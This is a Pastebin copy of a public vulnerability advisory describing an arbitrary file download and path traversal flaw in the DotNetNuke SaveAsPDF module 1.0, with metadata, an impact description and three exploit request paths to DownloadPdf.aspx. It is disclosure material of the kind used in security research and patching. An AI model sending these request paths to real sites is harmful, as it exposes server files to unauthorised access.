Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 12/03/2019
- # Vendor Homepage : bizmodules.net ~ dnnsoftware.com
- # Software Information Links :
- bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx
- bizmodules.net/portals/0/downloads/sap.pdf
- # Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type :
- CWE-200 [ Information Exposure ]
- CWE-23 [ Relative Path Traversal ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke
- websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including
- texts, pictures and even flash contents.
- ####################################################################
- # Impact :
- ***********
- * DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download
- arbitrary files because the application fails to sufficiently sanitize user-supplied input.
- An attacker can exploit this issue to download arbitrary files within the context of the
- web server process and obtain potentially sensitive informations and it works for
- open redirection vulnerability.
- * An information exposure is the intentional or unintentional disclosure of information to an actor
- that is not explicitly authorized to have access to that information.
- * The software uses external input to construct a pathname that should be within a
- restricted directory, but it does not properly neutralize sequences such as ".." that
- can resolve to a location that is outside of that directory.
- ####################################################################
- # Arbitrary File Download Exploit :
- *******************************
- /DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov
- /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]
- /DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]
- Note : It can download any random website as pdf file in to your computer and
- it downloads a system files from DNNSoftware.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment